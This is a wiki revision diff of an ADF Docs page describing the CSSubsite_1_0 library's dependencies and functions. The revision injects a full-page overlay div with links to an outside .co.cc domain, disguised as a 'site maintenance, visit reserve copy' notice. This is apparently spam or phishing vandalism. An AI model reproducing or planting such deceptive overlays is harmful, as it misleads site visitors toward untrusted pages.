Difference between revisions of "CSSubsite 1 0"
From ADF Docs
Line 1: | Line 1: | ||
+ | ---- | ||
+ | <div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;"> | ||
+ | ---- | ||
+ | =[http://ovarynetyv.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]= | ||
+ | ---- | ||
+ | =[http://ovarynetyv.co.cc CLICK HERE]= | ||
+ | ---- | ||
+ | </div> | ||
__NOTOC__ | __NOTOC__ | ||
Line 17: | Line 25: | ||
== Functions == | == Functions == | ||
− | + | <div id='library-api'> | |
:[[CSSubsite_1_0-buildSubsitesFromPath|buildSubsitesFromPath]] ( string subsitePath ) | :[[CSSubsite_1_0-buildSubsitesFromPath|buildSubsitesFromPath]] ( string subsitePath ) | ||
::Verifies the subsite path exists or creates the subsites. Returns the last subsites ID. | ::Verifies the subsite path exists or creates the subsites. Returns the last subsites ID. | ||
Line 23: | Line 31: | ||
::Creates the subsite based on argument data | ::Creates the subsite based on argument data | ||
:[[CSSubsite_1_0-handleCreateSubsite|handleCreateSubsite]] ( string subsitePath ) | :[[CSSubsite_1_0-handleCreateSubsite|handleCreateSubsite]] ( string subsitePath ) | ||
− | + | </div> |
Revision as of 23:16, 23 November 2010
Attention: Do not change any text in the description, properties, and functions sections.
Return to Library (API)
Description
Constructs a CCAPI object and then creates a subsite based on the argument data passed in
Properties
- dependency = utils_1_0
- dependency = csData_1_0
- dependency = ccapi
- version = 1_0_0
- wikiTitle = CSSubsite_1_0
- type = transient
Functions
<div id='library-api'>
- buildSubsitesFromPath ( string subsitePath )
- Verifies the subsite path exists or creates the subsites. Returns the last subsites ID.
- createSubsite ( struct subsiteData, numeric parentSubsite, numeric doLogin )
- Creates the subsite based on argument data
- handleCreateSubsite ( string subsitePath )
</div>